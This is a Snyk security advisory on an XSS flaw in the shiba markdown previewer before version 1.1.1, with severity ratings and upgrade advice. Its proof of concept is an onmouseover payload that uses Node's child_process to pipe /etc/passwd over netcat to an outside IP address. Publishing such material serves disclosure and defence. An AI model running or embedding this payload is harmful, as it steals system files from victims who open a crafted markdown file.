Cross-site Scripting (XSS) Affecting shiba package, versions <1.1.1
Snyk CVSS
Attack Complexity
Low
User Interaction
Required
Confidentiality
High
Threat Intelligence
Exploit Maturity
Mature
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-SHIBA-1083282
- published 9 Mar 2021
- disclosed 15 May 2018
- credit silviavali
How to fix?
Upgrade shiba to version 1.1.1 or higher.
Overview
shiba is a Live markdown previewer with linter
Affected versions of this package are vulnerable to Cross-site Scripting (XSS). It is possible to inject malicious JavaScript as part of a markdown file which is executed as JavaScript. This can be leveraged to execute arbitrary commands on a victim's system.
PoC
<s <onmouseover="alert(1)"> <s onmouseover="const exec = require('child_process').exec; exec('nc -w 3 192.168.8.100 1337 < /etc/passwd', (e, stdout, stderr)=> { if (e instanceof Error)
{ console.error(e); throw e; } console.log('stdout ', stdout); console.log('stderr ', stderr); });alert('1')">Hallo</s>